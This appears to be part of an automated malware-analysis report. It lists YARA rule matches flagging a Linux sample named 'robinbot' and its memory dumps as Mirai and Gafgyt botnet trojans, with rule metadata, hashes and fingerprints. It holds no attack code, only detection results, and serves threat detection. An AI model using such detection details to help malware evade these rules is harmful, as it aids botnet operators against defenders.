              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c Author: unknown
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 Author: unknown
              Source: robinbot, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
              Source: robinbot, type: SAMPLEMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
              Source: robinbot, type: SAMPLEMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
              Source: 6227.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d0c57a2e os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ee7d3a33575ed3aa7431489a8fb18bf30cfd5d6c776066ab2a27f93303124b6, id = d0c57a2e-c10c-436c-be13-50a269326cf2, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_0bce98a2 reference_sample = 1b20df8df7f84ad29d81ccbe276f49a6488c2214077b13da858656c027531c80, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 993d0d2e24152d0fb72cc5d5add395bed26671c3935f73386341398b91cb0e6e, id = 0bce98a2-113e-41e1-95c9-9e1852b26142, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_95e0056c reference_sample = 45f67d4c18abc1bad9a9cc6305983abf3234cd955d2177f1a72c146ced50a380, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a2550fdd2625f85050cfe53159858207a79e8337412872aaa7b4627b13cb6c94, id = 95e0056c-bc07-42cf-89ab-6c0cde3ccc8a, last_modified = 2021-09-16
              Source: 6226.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
              Source: 6224.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
